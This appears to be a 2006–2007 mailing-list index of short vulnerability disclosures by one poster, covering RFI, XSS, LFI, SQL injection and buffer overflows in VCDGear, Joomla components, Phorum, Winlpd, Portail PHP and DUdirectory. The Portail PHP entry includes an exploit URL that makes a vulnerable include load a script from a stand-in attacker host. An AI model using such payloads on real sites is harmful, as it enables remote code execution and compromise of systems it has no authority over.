VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit

2007-04-14 Thread meftun
/* ~~0day~~ Discovered by: C-W-M Auther: C-W-M ~ Www.MeftunNet.Com & Www.HackerSecurity.Org Location : Turkey... Attack Vector: SEH overwrite Type: Local Tested on Win2k SP4 (English) Software: VCDGear v3.56 build 050213 Website: www

Mambo/Joomla Component New Article Component RFI

2007-04-17 Thread meftun
= Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple RFI = Found By : C-W-M Special Thnx ; Eskobar, Poizonb0x, eno7, DoubleKickx ==

Cross-Site Scripting and Local File Inclusion in Phorum

2006-07-27 Thread Meftun
Some vulnerabilities have been discovered in Phorum, which can be exploited by malicious people to conduct cross-site scripting attacks, disclose sensitive information, and potentially compromise a vulnerable system. 1) Input passed to the "template" parameter in pm.php isn't properly verifie

Buffer Overflow Vulnerability in Winlpd

2006-07-27 Thread Meftun
Pablo Isola has discovered a vulnerability in Winlpd, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error when handling received requests. This can be exploited to cause a stack-based buffer overflow by passing an

Portail PHP v1.7 Remote File Include

2006-07-28 Thread Meftun
TED]: meftun[at]meftunnet[dot]com #CODE:include ("$chemin/include/config.php") #Exploit: http://www.site.com/[path]/mod_membre/inscription.php?chemin=http://evil_scripts? #Thanx : Www.HackMaster.Us #Greetz: RooTTeR, XYU, Cyborg, BuZuL and all Hackmaster.Us Users

DUdirectory Admin Panel SQL Injection

2006-12-07 Thread Meftun
C-W-M & HackerSecurity.Org## ##Contact: Meftun[at]Meftunnet[dot]Com### #Greetz: Eskobar , Doublekickx, Poizonb0x ##WWW.HACKERSECURITY.ORG# #